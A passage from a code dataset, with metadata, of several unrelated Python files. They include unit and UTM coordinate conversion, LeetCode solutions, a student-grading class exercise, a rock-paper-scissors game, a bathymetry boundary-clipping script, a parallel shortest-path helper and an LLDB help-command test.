[3.6, 0]\n elif (A == 'mm h-1') & (B == 'm s-1'):\n p = [1./3.6 * 1e-6, 0]\n elif (A == 'm s-1') & (B == 'mm h-1'):\n p = [3.6 * 1e6, 0]\n elif (A == 'm s-1') & (B == 'knot'):\n p = [1.9438444924574, 0]\n elif (A == 'knot') & (B == 'm s-1'):\n p = [0.51444444444, 0]\n elif (A in [u'µmol m-2 s-1', 'µmol m-2 s-1', 'µmol m-2 s-1']) & (B == 'mol m-2 s-1'):\n p = [1e-6, 0]\n elif (A == 'mol m-2 s-1') & (B == u'µmol m-2 s-1'):\n p = [1e6, 0]\n elif (A in [u'µg l-1', 'µg l-1', 'µg l-1']) & (B == 'kg m-3'):\n p = [1e-6, 0]\n elif (A == 'kg m-3') & (B == u'µg l-1'):\n p = [1e6, 0]\n elif (A == 'mg l-1') & (B == 'kg m-3'):\n p = [1e-3, 0]\n elif (A == 'kg m-3') & (B == 'mg l-1'):\n p = [1e3, 0]\n elif (A == 'mg m-3') & (B == 'kg m-3'):\n p = [1e-6, 0]\n elif (A == 'kg m-3') & (B == 'mg m-3'):\n p = [1e6, 0]\n elif (A == u'µmol m-3') & (B == 'mol m-3'):\n p = [1e-6, 0]\n elif (A == 'mol m-3') & (B == u'µmol m-3'):\n p = [1e6, 0]\n elif (A == u'µmol l-1') & (B == 'mol m-3'):\n p = [1e-9, 0]\n elif (A == 'mol m-3') & (B == u'µmol l-1'):\n p = [1e9, 0]\n # The following conversions are experimental!!!\n elif (A == 'rfu') & (B == '1'):\n p = [1, 0]\n elif (A == 'ppb') & (B == '1'):\n p = [1, 0]\n #elif (A == '') & (B == ''):\n else:\n raise ValueError('Unable to convert from `{}` to `{}`.'.format(A, B))\n #\n if vtype == 'stdev':\n p[1] = 0\n #\n if isinstance(data_in, ma.MaskedArray):\n return ma.array(polyval(p, data_in.data), mask=data_in.mask)\n else:\n return polyval(p, data_in)\n\n\ndef fromUTMtoLonLat(E, N, zone, hemisphere=1, datum='WGS84'):\n \"\"\"\n Converts geographical units from Universal Transverse Mercator (UTM)\n conformal projection to longitude and latitude.\n\n Parameters\n ----------\n E, N : float, array like\n Easting and northing geographic Cartesial coordinates in meters.\n zone : integer\n hemisphere : char, integer, optional\n Either `N` or `+1` for northern hemisphere or `S` or `-1` for\n southern hemisphere.\n datum: string, optional\n\n Returns\n -------\n lon, lat : float, array like\n Longitude and latitude equivalent to UTM coordinates.\n k : float, array like\n gamma : float, array like\n\n References\n ----------\n .. [1] Universal Transverse Mercator coordinate system. Available at\n https://en.wikipedia.org/wiki/\n Universal_Transverse_Mercator_coordinate_system\n\n \"\"\"\n # Checks for easting and northing parameter data type. If they are arrays\n # we have to create a meshgrid to perform all the calculations.\n if (isinstance(E, (ndarray, list, tuple)) |\n isinstance(N, (ndarray, list, tuple))):\n E, N = meshgrid(asarray(E), asarray(N))\n # Converts easting and northing parameters to kilometers.\n E, N = E * 1e-3, N * 1e-3\n\n # Constants and parameters\n a = 6378.137 # Equatorial radius of the earth in km.\n if hemisphere in ['N', 'n', 1]:\n N0 = 0\n hemisphere = 1.\n elif hemisphere in ['S', 's', -1]:\n N0 = 10000 # Wikipedia assumes km.\n hemisphere = -1.\n k0 = 0.9996\n E0 = 500 # Again, Wikipedia assumes km.\n f = 1./ 298357223536\n\n # Some calculated parameters\n n = f / (2 - f)\n A = a / (1 + n) * (1 + n**2/4 + n**4 / 64)\n beta = [1./2*n - 2./3*n**2 + 37./96/n**3, 1./48*n**2 + 1./15*n**3,\n 17./480*n**3]\n delta = [2*n - 2./3*n**2 - 2*n**3, 7./3*n**2 - 8./5*n**3, 56./15*n**3]\n\n # Simple lambda functions\n beta_sincosh = lambda j, epsilon, eta: beta[j-1] * sin(2*j*epsilon) * cosh(2*j*eta)\n beta_cossinh = lambda j, epsilon, eta: beta[j-1] * cos(2*j*epsilon) * sinh(2*j*eta)\n beta_coscosh = lambda j, epsilon, eta: 2 * j * beta[j-1] * cos(2*j*epsilon) * cosh(2*j*eta)\n beta_sinsinh = lambda j, epsilon, eta: 2 * j * beta[j-1] * sin(2*j*epsilon) * sinh(2*j*eta)\n\n # Intermediate values\n epsilon = (N - N0) / (k0 - A)\n eta = (E - E0) / (k0 - A)\n epsilon_ = epsilon - (beta_sincosh(1, epsilon, eta) + beta_sincosh(2, epsilon, eta) + beta_sincosh(3, epsilon, eta))\n eta_ = eta - (beta_cossinh(1, epsilon, eta) + beta_cossinh(2, epsilon, eta) + beta_cossinh(3, epsilon, eta))\n sigma_ = 1 - (beta_coscosh(1, epsilon, eta) + beta_coscosh(2, epsilon, eta) + beta_coscosh(3, epsilon, eta))\n tau_ = (beta_sinsinh(1, epsilon, eta) + beta_sinsinh(2, epsilon, eta) + beta_sinsinh(3, epsilon, eta))\n chi = arcsin(sin(epsilon_) / cosh(eta_))\n\n # Finally\n phi = chi + (delta[0] * sin(2*1*chi) + delta[1] * sin(2*2*chi) +\n delta[2] * sin(2*3*chi)) # Latitude\n lambda0 = zone * 6. - 183. # Longitude of reference meridian\n lambda_ = lambda0 + arctan(sinh(eta_) / cos(epsilon_))\n k = k0 * A / a * ((1 + ((1 - n)/(1 + n) * tan(phi))**2) * (((cos(epsilon_))**2 + (sinh(eta_))**2) / (sigma_**2 + tau_**2)))**0.5\n gamma = hemisphere * arctan((tau_ + sigma_ * tan(epsilon_) * tanh(eta_)) / (sigma_ - tau_ * tan(epsilon_) * tanh(eta_)))\n #\n return lambda_, phi, k, gamma\n","repo_name":"regeirk/atlantis","sub_path":"units/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"24354542265","text":"# 1239. Maximum Length of a Concatenated String with Unique Characters\n# Given an array of strings arr. String s is a concatenation of a sub-sequence of arr which have unique characters.\n#\n# Return the maximum possible length of s.\n#\n# Example 1:\n#\n# Input: arr = [\"un\",\"iq\",\"ue\"]\n# Output: 4\n# Explanation: All possible concatenations are \"\",\"un\",\"iq\",\"ue\",\"uniq\" and \"ique\".\n# Maximum length is 4.\n#\n# Example 2:\n#\n# Input: arr = [\"cha\",\"r\",\"act\",\"ers\"]\n# Output: 6\n# Explanation: Possible solutions are \"chaers\" and \"acters\".\n#\n# Example 3:\n#\n# Input: arr = [\"abcdefghijklmnopqrstuvwxyz\"]\n# Output: 26\n\n# 回溯(递归)+ 位运算\n\nclass Solution:\n def maxLength(self, arr: List[str]) -> int:\n masks = list()\n for s in arr:\n mask = 0\n for ch in s:\n idx = ord(ch) - ord(\"a\")\n if ((mask >> idx) & 1): # // 若 mask 已有 ch,则说明 s 含有重复字母,无法构成可行解\n mask = 0\n break\n mask |= 1 << idx # 将 ch 加入 mask 中\n if mask > 0:\n masks.append(mask)\n\n ans = 0\n\n def backtrack(pos: int, mask: int) -> None:\n if pos == len(masks):\n nonlocal ans\n ans = max(ans, bin(mask).count(\"1\"))\n return\n\n if (mask & masks[pos]) == 0: # mask 和 masks[pos] 无公共元素\n backtrack(pos + 1, mask | masks[pos])\n backtrack(pos + 1, mask)\n\n backtrack(0, 0)\n return ans\n\n# 迭代 + 位运算\n\nclass Solution:\n def maxLength(self, arr: List[str]) -> int:\n ans = 0\n masks = [0]\n for s in arr:\n mask = 0\n for ch in s:\n idx = ord(ch) - ord(\"a\")\n if ((mask >> idx) & 1): # // 若 mask 已有 ch,则说明 s 含有重复字母,无法构成可行解\n mask = 0\n break\n mask |= 1 << idx # 将 ch 加入 mask 中\n if mask == 0:\n continue\n\n n = len(masks)\n for i in range(n):\n m = masks[i]\n if (m & mask) == 0: # m 和 mask 无公共元素\n masks.append(m | mask)\n ans = max(ans, bin(m | mask).count(\"1\"))\n\n return ans\n","repo_name":"Dis-count/ProgrammingPractice","sub_path":"153.py","file_name":"153.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32934923855","text":"from typing import List\n\n\ndef get_average_grades(all_grades: dict[str: List[int]]) -> int:\n result = []\n for key, value in all_grades.items():\n result.append(sum(value) / len(value))\n average_grades = sum(result) / len(result)\n return average_grades\n\n\nclass Student:\n def __init__(self, name, surname, gender):\n self.name = name\n self.surname = surname\n self.gender = gender\n self.finished_courses = []\n self.courses_in_progress = []\n self.grades = {}\n\n def rate_lecturer(self, lecturer, course, grade):\n if isinstance(lecturer, Lecturer) and course in self.courses_in_progress \\\n and course in lecturer.courses_attached:\n if course in lecturer.grades:\n lecturer.grades[course] += [grade]\n else:\n lecturer.grades[course] = [grade]\n else:\n return 'Ошибка'\n\n def __gt__(self, other):\n average_grades_self = get_average_grades(self.grades)\n average_grades_other = get_average_grades(other.grades)\n\n if isinstance(other, Student):\n if average_grades_self > average_grades_other:\n return f'Cредние оценки студента {self.name} больше, чем студента {other.name}'\n else:\n return f'Типы сравниваемых объектов отличаются!'\n\n def __lt__(self, other):\n average_grades_self = get_average_grades(self.grades)\n average_grades_other = get_average_grades(other.grades)\n if isinstance(other, Student):\n if average_grades_self < average_grades_other:\n return f'Cредние оценки студента {self.name} больше, чем студента {other.name}'\n else:\n return f'Типы сравниваемых объектов отличаются!'\n\n def __eq__(self, other):\n average_grades_self = get_average_grades(self.grades)\n average_grades_other = get_average_grades(other.grades)\n if isinstance(other, Student):\n if average_grades_self == average_grades_other:\n return f'Cредние оценки студента {self.name} равны оценкам студента {other.name}'\n else:\n return f'Типы сравниваемых объектов отличаются!'\n\n def __str__(self):\n average_grades = get_average_grades(self.grades)\n # result = []\n # for key, value in self.grades.items():\n # result.append(sum(value)/len(value))\n # average_grades = sum(result)/len(result)\n return f'Имя: {self.name}\\n' \\\n f'Фамилия: {self.surname}\\n' \\\n f'Средняя оценка за домашние задания: {round(average_grades, 2)}\\n' \\\n f'Курсы в процессе изучения: {\", \".join(self.courses_in_progress)}\\n' \\\n f'Завершенные курсы: {\", \".join(self.finished_courses)}'\n\n\nclass Mentor:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n self.courses_attached = []\n\n\nclass Lecturer(Mentor):\n def __init__(self, name, surname):\n super().__init__(name, surname)\n self.grades = {}\n\n def __gt__(self, other):\n average_grades_self = get_average_grades(self.grades)\n average_grades_other = get_average_grades(other.grades)\n\n if isinstance(other, Lecturer):\n if average_grades_self > average_grades_other:\n return f'Cредние оценки лектора {self.name} больше, чем лектора {other.name}'\n else:\n return f'Типы сравниваемых объектов отличаются!'\n\n def __lt__(self, other):\n average_grades_self = get_average_grades(self.grades)\n average_grades_other = get_average_grades(other.grades)\n if isinstance(other, Lecturer):\n if average_grades_self < average_grades_other:\n return f'Cредние оценки лектора {self.name} больше, чем лектора {other.name}'\n else:\n return f'Типы сравниваемых объектов отличаются!'\n\n def __eq__(self, other):\n average_grades_self = get_average_grades(self.grades)\n average_grades_other = get_average_grades(other.grades)\n if isinstance(other, Lecturer):\n if average_grades_self == average_grades_other:\n return f'Cредние оценки лектора {self.name} равны оценкам лектора {other.name}'\n else:\n return f'Типы сравниваемых объектов отличаются!'\n\n def __str__(self):\n average_grades = get_average_grades(self.grades)\n # result = []\n # for key, value in self.grades.items():\n # result.append(sum(value)/len(value))\n # average_grades = sum(result)/len(result)\n return f'Имя: {self.name}\\n' \\\n f'Фамилия: {self.surname}\\n' \\\n f'Средняя оценка за лекции: {round(average_grades, 2)}\\n'\n\n\nclass Reviewer(Mentor):\n def __init__(self, name, surname):\n super().__init__(name, surname)\n\n def rate_hw(self, student, course, grade):\n if isinstance(student, Student) and course in self.courses_attached and course in student.courses_in_progress:\n if course in student.grades:\n student.grades[course] += [grade]\n else:\n student.grades[course] = [grade]\n else:\n return 'Ошибка'\n\n def __str__(self):\n return f'Имя: {self.name}\\nФамилия: {self.surname}\\n'\n\n\nbest_student = Student('Ruoy', 'Eman', 'your_gender')\nbest_student.courses_in_progress += ['Python']\nbest_student.courses_in_progress += ['Git']\nbest_student.finished_courses += ['Введение в программирование']\n\ncool_student = Student('Molly', 'Gwins', 'your_gender')\ncool_student.courses_in_progress += ['Git']\ncool_student.courses_in_progress += ['Python']\ncool_student.courses_in_progress += ['Django']\ncool_student.finished_courses += ['Введение в программирование']\n\nfirst_reviewer = Reviewer('Some', 'Buddy')\nfirst_reviewer.courses_attached += ['Python']\nfirst_reviewer.courses_attached += ['Git']\n\nsecond_reviewer = Reviewer('Karl', 'Stone')\nsecond_reviewer.courses_attached += ['Git']\nsecond_reviewer.courses_attached += ['Django']\n\nfirst_lecturer = Lecturer('Spam', 'Eggs')\nfirst_lecturer.courses_attached += ['Python']\nfirst_lecturer.courses_attached += ['Git']\n\nsecond_lecturer = Lecturer('Lama', 'Alabama')\nsecond_lecturer.courses_attached += ['Django']\nsecond_lecturer.courses_attached += ['Python']\n\nfirst_reviewer.rate_hw(best_student, 'Python', 10)\nfirst_reviewer.rate_hw(best_student, 'Git', 9)\nfirst_reviewer.rate_hw(cool_student, 'Python', 10)\n\nsecond_reviewer.rate_hw(best_student, 'Django', 8)\nsecond_reviewer.rate_hw(cool_student, 'Git', 10)\nsecond_reviewer.rate_hw(cool_student, 'Django', 7)\n\nbest_student.rate_lecturer(first_lecturer, 'Python', 10)\ncool_student.rate_lecturer(first_lecturer, 'Git', 8)\n# print(best_student.grades)\n# print(cool_student.grades)\nprint(first_lecturer.grades)\nprint(second_lecturer.grades)\n\n\n# print(first_reviewer)\n# print(first_lecturer)\n# print(best_student)\n# print(cool_student)\n\n\ndef get_average_students_grade_course(students_list: List[Student], course: str):\n result = []\n for student in students_list:\n if course in student.grades:\n for grade in student.grades[course]:\n result.append(grade)\n\n average_course_grade = sum(result) / len(result)\n return f'Средняя оценка студентов по курсу {course} составляет {average_course_grade}'\n\n\ndef get_average_lecturers_grade_course(lecturers_list: List[Lecturer], course: str):\n result = []\n for lecturer in lecturers_list:\n if course in lecturer.grades:\n for grade in lecturer.grades[course]:\n result.append(grade)\n#\n#\n average_course_grade = sum(result) / len(result)\n return f'Средняя оценка лекторов по курсу {course} составляет {average_course_grade}'\n\n\nprint(get_average_students_grade_course([best_student, cool_student], 'Git'))\nprint(get_average_lecturers_grade_course([first_lecturer, second_lecturer], 'Git'))\n","repo_name":"Zeilanda/Netology-OOP","sub_path":"students_and_mentors.py","file_name":"students_and_mentors.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"22881213030","text":"\r\nclass computer: # for define a class\r\n def config(self): # define a method which actually func\r\n print(\"16gb RAM,550gb SSD,i9 core Processor\")\r\n\r\n\r\ncomp1 = computer() # make object with the help of class\r\ncomp2 = computer()\r\n\r\n# computer.config(comp1) # calling config and passing comp1\r\n# computer.config(comp2)\r\n\r\ncomp1.config() # method config use comp1 as parameter as self object\r\ncomp2.config()\r\n\r\n\r\n","repo_name":"HudaitRITAM/python_Basic","sub_path":"class_object_1.py","file_name":"class_object_1.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"32654227821","text":"games = [\"Monopoly\",\"Trivial Pursuit\",\"Chess\",\"Poker\"]\nprint(\"I like the games: \" + str(games))\n\nwantsToAdd = True\nwhile (wantsToAdd):\n new_game = input(\"Do you want to add a new game? \")\n if (new_game.contains(\"es\")):\n games.append(new_game)\n else:\n wantsToAdd = False\n\n\"\"\"\nnew_game = input(\"What game do you like to play? \")\ngames.append(new_game)\nprint(\"Games we like: \" + str(games))\n\"\"\"","repo_name":"ChDonnelly/ATCS-2021","sub_path":"project0/manyGames.py","file_name":"manyGames.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70835675575","text":"# Chap 8.1 - Modules\n# Modules in Python\n# 3. Namespaces\n\n# Nice, this explains about aliasing (similar to Bash i guess). In Python aliasing is \"as\"\n# import module_name as name_you_pick_for_the_module\n\n# Tasks\n# 1. Below import codecademylib3_seaborn, import pyplot from the module matplotlib with alias plt\n# 2. Import random below the other import statements. It's best to keep all imports at the top of your file.\n# 3. Create a variable numbers_a and set it equal to the range of numbers 1 through 12 (inclusive)\n# 4. Create a variable numbers_b and set it equal to a random sample of twelve numbers within range(1000)\n# 5. Now let's plot these number sets against each other using plt. Call plt.plot() with your two variables\n# as it's arbuments\n# 6. Now call plt.show() and run your code!\n\nfrom matplotlib import pyplot as plt\nimport random\n\nnumbers_a = range(1, 13)\nnumbers_b = random.sample(range(1000), 12)\nprint(numbers_b)\n\nplt.plot(numbers_a, numbers_b)\nplt.show()\n\n# Cool, first thing outside terminal :D\n\n\n","repo_name":"DiggsAsura/study","sub_path":"archive/codecademy/Python3/8.1_Modules_3-Namepaces.py","file_name":"8.1_Modules_3-Namepaces.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6514723189","text":"#!/usr/bin/env python3\n\nfrom pycascadia.loaders import load_source\nfrom pygmt import grdcut\nimport matplotlib.pyplot as plt\nimport argparse\n\n\ndef clip_to_value(arr, test_arr=None, value=0.0):\n if test_arr is None:\n test_arr = arr\n\n arr[test_arr > value] = value\n\n\ndef main():\n # Handle arguments\n parser = argparse.ArgumentParser(\n description=\"Add piecewise halo surrounding given netcdf file\"\n )\n parser.add_argument(\"--input\", required=True, help=\"input file\")\n parser.add_argument(\"--output\", required=True, help=\"output file\")\n parser.add_argument(\n \"--value\", type=float, default=0.0, help=\"value to replace boundary with\"\n )\n parser.add_argument(\n \"--offset\",\n action=\"store_true\",\n default=False,\n help=\"use one index from true boundary as boundary\",\n )\n parser.add_argument(\n \"--plot\",\n action=\"store_true\",\n default=False,\n help=\"plot final grid before saving\",\n )\n parser.add_argument(\n \"--region\",\n required=False,\n metavar=(\"xmin\", \"xmax\", \"ymin\", \"ymax\"),\n nargs=4,\n type=float,\n help=\"output region. Defaults to the extent of the input grid.\",\n )\n args = parser.parse_args()\n\n in_fname = args.input\n input_grid, _, _ = load_source(in_fname, plot=False)\n\n if args.region:\n input_grid = grdcut(input_grid, region=args.region)\n\n if args.offset:\n clip_to_value(input_grid[0, :], input_grid[1, :], value=args.value)\n clip_to_value(input_grid[-1, :], input_grid[-2, :], value=args.value)\n clip_to_value(input_grid[:, 0], input_grid[:, 1], value=args.value)\n clip_to_value(input_grid[:, -1], input_grid[:, -2], value=args.value)\n else:\n clip_to_value(input_grid[0, :], value=args.value)\n clip_to_value(input_grid[-1, :], value=args.value)\n clip_to_value(input_grid[:, 0], value=args.value)\n clip_to_value(input_grid[:, -1], value=args.value)\n\n if args.plot:\n # Plot bath & contour on top\n input_grid.plot()\n plt.contour(\n input_grid.x,\n input_grid.y,\n input_grid.values,\n levels=[args.value],\n colors=[\"green\"],\n )\n\n # Increase view of region to display closed contours\n BORDER_SCALE = 0.1\n x_diff = input_grid.x[-1] - input_grid.x[0]\n y_diff = input_grid.y[-1] - input_grid.y[0]\n plt.xlim(\n input_grid.x[0] - BORDER_SCALE * x_diff,\n input_grid.x[-1] + BORDER_SCALE * x_diff,\n )\n plt.ylim(\n input_grid.y[0] - BORDER_SCALE * y_diff,\n input_grid.y[-1] + BORDER_SCALE * y_diff,\n )\n\n plt.show()\n\n input_grid.to_netcdf(args.output)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UCL/pyCascadia","sub_path":"scripts/close_boundary.py","file_name":"close_boundary.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"7863862930","text":"\"\"\"A program that plays the game of Rock, Paper, Scissors.\n\nUsage: rps.py\n\nAttributes:\n MOVES: A list of strs representing possible moves (default: \"rock\",\n \"paper\", and \"scissors\")\n\nClasses:\n Player()\n RandomPlayer()\n HumanPlayer()\n ReflectPlayer()\n CyclePlayer()\n Game()\n\"\"\"\n\nimport random\n\nMOVES = [\"rock\", \"paper\", \"scissors\"]\n\n\nclass Player:\n \"\"\"Creates a player that always plays 'rock'.\"\"\"\n\n @staticmethod\n def move():\n \"\"\"Returns the move 'rock'.\n\n Returns:\n rock: A str representing the move rock\n \"\"\"\n return \"rock\"\n\n def learn(self, my_move, their_move):\n \"\"\"Placeholder for child classes.\n\n Args:\n my_move: A str representing the calling player's move\n their_move: A str representing the calling player's opponent's move\n \"\"\"\n\n\nclass RandomPlayer(Player):\n \"\"\"Creates a player that plays a random move from the MOVES array.\"\"\"\n\n def move(self):\n \"\"\"Returns a random move from the MOVES array.\n\n Returns:\n A str representing a move from the MOVES array\n \"\"\"\n return random.choice(MOVES)\n\n\nclass HumanPlayer(Player):\n \"\"\"Creates a player that is human controllable.\"\"\"\n\n def move(self):\n \"\"\"Returns a move of the human player's choosing.\n\n Returns:\n move: A str representing a move from the MOVES array chosen by the\n human player\n \"\"\"\n while True:\n move = input(\"Rock, paper, scissors? > \").lower()\n if move in MOVES:\n return move\n\n\nclass ReflectPlayer(Player):\n \"\"\"Creates a player that plays based on the opponent's previous move.\n\n Attributes:\n next_move: A str representing the player's next move\n \"\"\"\n\n def __init__(self):\n \"\"\"Reflect Player set-up.\"\"\"\n self.next_move = random.choice(MOVES)\n\n def move(self):\n \"\"\"Returns the player's next move.\n\n Returns:\n self.next_move: A str presenting the players next move\n \"\"\"\n return self.next_move\n\n def learn(self, my_move, their_move):\n \"\"\"Sets the player's next move to their opponent's previous move.\n\n Args:\n my_move: A str representing the calling player's move\n their_move: A str representing the calling player's opponent's move\n \"\"\"\n self.next_move = their_move\n\n\nclass CyclePlayer(Player):\n \"\"\"Creates a player that plays 'rock', 'paper', 'scissors', in that order.\n\n Attributes:\n next_move: A str representing the player's next move\n \"\"\"\n\n def __init__(self):\n \"\"\"Cycle Player set-up.\"\"\"\n self.next_move = \"rock\"\n\n def move(self):\n \"\"\"Returns the player's next move.\n\n Returns:\n self.next_move: A str presenting the players next move\n \"\"\"\n return self.next_move\n\n def learn(self, my_move, their_move):\n \"\"\"Sets the player's next move to the next move in the MOVES array.\n\n Args:\n my_move: A str representing the calling player's move\n their_move: A str representing the calling player's opponent's move\n \"\"\"\n my_move_index = MOVES.index(my_move)\n next_move_index = (my_move_index + 1) % 3\n self.next_move = MOVES[next_move_index]\n\n\ndef beats(one, two):\n \"\"\"Returns a bool representing if the first arg is the winner.\n\n Args:\n one: A str representing a player's move\n two: A str representing a player's move\n\n Returns:\n A bool that is True if one is the winner\n \"\"\"\n return (\n (one == \"rock\" and two == \"scissors\")\n or (one == \"scissors\" and two == \"paper\")\n or (one == \"paper\" and two == \"rock\")\n )\n\n\nclass Game:\n \"\"\"Creates a game or rock, paper, scissors played between two players.\n\n Attributes:\n player1: A Player class representing player 1\n player2: A Player class representing player 2\n score1: An int representing player 1's score\n score2: An int representing player 2's score\n \"\"\"\n\n def __init__(self, player1, player2):\n \"\"\"Game set-up.\"\"\"\n self.player1 = player1\n self.player2 = player2\n self.score1 = 0\n self.score2 = 0\n\n def play_round(self):\n \"\"\"Plays a round of rock, paper Scissors.\n\n Collects the moves of both players, determines a winner, and then\n displays and updates the score\n \"\"\"\n move1 = self.player1.move()\n move2 = self.player2.move()\n print(f\"Player 1: {move1} Player 2: {move2}\")\n\n if beats(move1, move2):\n self.score1 += 1\n print(\"** PLAYER ONE WINS **\")\n elif beats(move2, move1):\n self.score2 += 1\n print(\"** PLAYER TWO WINS **\")\n else:\n print(\"** TIE **\")\n\n print(f\"Score: Player One {self.score1}, Player Two {self.score2}\\n\")\n self.player1.learn(move1, move2)\n self.player2.learn(move2, move1)\n\n def play_game(self):\n \"\"\"Plays a 3-round game of rock, paper, scissors.\n\n Plays three rounds of rock, paper scissors, and in the event of a tie\n score, continues to play extra rounds until there is a winner, and then\n displays the final score\n \"\"\"\n print(\"\\nGame start!\\n\")\n\n for rnd in range(3):\n print(f\"Round {rnd} of 3:\")\n self.play_round()\n\n while self.score1 == self.score2:\n print(\"Game cannot end in a tie, entering sudden death overtime\")\n self.play_round()\n\n print(\n f\"Final Score: Player One {self.score1}, Player Two \"\n f\"{self.score2}\\n\"\n )\n\n if self.score1 > self.score2:\n print(\"** PLAYER ONE IS THE CHAMPION **\")\n elif self.score2 > self.score1:\n print(\"** PLAYER TWO IS THE CHAMPION **\")\n\n print(\"Game over!\\n\")\n\n\nif __name__ == \"__main__\":\n COMPUTER_PLAYER = random.choice(\n [Player(), RandomPlayer(), CyclePlayer(), ReflectPlayer()]\n )\n GAME = Game(HumanPlayer(), COMPUTER_PLAYER)\n GAME.play_game()\n","repo_name":"danrneal/rock-paper-scissors","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"8660761976","text":"import multiprocessing as mp\r\nimport networkx as nx\r\n\r\n\r\ndef worker(process_id, n_processes, G, d):\r\n \"\"\"thread worker function\"\"\"\r\n n_nodes = len(G.nodes)\r\n local_dict = dict()\r\n for ii in range(int(n_nodes / n_processes * process_id), int(n_nodes / n_processes * (process_id + 1))):\r\n length = nx.single_source_shortest_path_length(G, ii)\r\n local_dict[ii] = length\r\n d[process_id] = local_dict\r\n\r\n\r\ndef optimized_shortest_path_length_all_pair(g, undirected=True):\r\n\r\n if g.is_directed() and undirected:\r\n g = g.to_undirected()\r\n\r\n if len(g.nodes) < 5000:\r\n return dict(nx.all_pairs_shortest_path_length(g))\r\n\r\n # create concurrency for the function all_pairs_shortest_path_length\r\n manager = mp.Manager()\r\n d = manager.dict()\r\n process = []\r\n n_processes = mp.cpu_count()\r\n\r\n # create different processes\r\n for i in range(n_processes):\r\n p = mp.Process(target=worker, args=(i, n_processes, g, d,))\r\n process.append(p)\r\n p.start()\r\n\r\n # rejoin processes\r\n for p in process:\r\n p.join()\r\n\r\n return_dict = dict()\r\n for ii in d.values():\r\n for node, length_dict in ii.items():\r\n return_dict[node] = length_dict\r\n return return_dict\r\n\r\n","repo_name":"lukebieri/bitcoinTopologySimulation","sub_path":"src/shortestPath.py","file_name":"shortestPath.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"39835513781","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def getLonelyNodes(self, root: TreeNode) -> List[int]:\n if not root:\n return []\n \n ans = []\n \n q = deque([(root, None)])\n \n while q:\n node, parent = q.popleft()\n \n if node.left: q.append((node.left, node))\n if node.right: q.append((node.right, node))\n \n if not parent or (parent.left and parent.right):\n continue\n \n ans.append(node.val)\n \n return ans","repo_name":"virtyaluk/leetcode","sub_path":"problems/1469/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"73930511417","text":"\"\"\"\nTest some lldb help commands.\n\nSee also CommandInterpreter::OutputFormattedHelpText().\n\"\"\"\n\nimport os, time\nimport unittest2\nimport lldb\nfrom lldbtest import *\n\nclass HelpCommandTestCase(TestBase):\n\n mydir = \"help\"\n\n def test_simplehelp(self):\n \"\"\"A simple test of 'help' command and its output.\"\"\"\n self.expect(\"help\",\n startstr = 'The following is a list of built-in, permanent debugger commands')\n\n def version_number_string(self):\n \"\"\"Helper function to find the version number string of lldb.\"\"\"\n plist = os.path.join(os.getcwd(), os.pardir, os.pardir, \"resources\", \"LLDB-info.plist\")\n try:\n CFBundleVersionSegFound = False\n with open(plist, 'r') as f:\n for line in f:\n if CFBundleVersionSegFound:\n version_line = line.strip()\n import re\n m = re.match(\"(.*)\", version_line)\n if m:\n version = m.group(1)\n return version\n else:\n # Unsuccessful, let's juts break out of the for loop.\n break\n\n if line.find(\"CFBundleVersion\") != -1:\n # Found our match. The next line contains our version\n # string, for example:\n # \n # 38\n CFBundleVersionSegFound = True\n\n except:\n # Just fallthrough...\n import traceback\n traceback.print_exc()\n pass\n\n # Use None to signify that we are not able to grok the version number.\n return None\n\n\n def test_help_version(self):\n \"\"\"Test 'help version' and 'version' commands.\"\"\"\n self.expect(\"help version\",\n substrs = ['Show version of LLDB debugger.'])\n version_str = self.version_number_string()\n self.expect(\"version\",\n patterns = ['LLDB-' + (version_str if version_str else '[0-9]+')])\n\n def test_help_should_not_hang_emacsshell(self):\n \"\"\"Command 'settings set term-width 0' should not hang the help command.\"\"\"\n self.runCmd(\"settings set term-width 0\")\n self.expect(\"help\",\n startstr = 'The following is a list of built-in, permanent debugger commands')\n\n def test_help_image_dump_symtab_should_not_crash(self):\n \"\"\"Command 'help image dump symtab' should not crash lldb.\"\"\"\n self.expect(\"help image dump symtab\",\n substrs = ['image dump symtab',\n 'sort-order'])\n\n def test_help_image_du_sym_is_ambiguous(self):\n \"\"\"Command 'help image du sym' is ambiguous and spits out the list of candidates.\"\"\"\n self.expect(\"help image du sym\",\n COMMAND_FAILED_AS_EXPECTED, error=True,\n substrs = ['error: ambiguous command image du sym',\n 'symfile',\n 'symtab'])\n\n def test_help_image_du_line_should_work(self):\n \"\"\"Command 'help image du line' is not ambiguous and should work.\"\"\"\n self.expect(\"help image du line\",\n substrs = ['Dump the debug symbol file for one or more executable images'])\n\n\nif __name__ == '__main__':\n import atexit\n lldb.SBDebugger.Initialize()\n atexit.register(lambda: lldb.SBDebugger.Terminate())\n 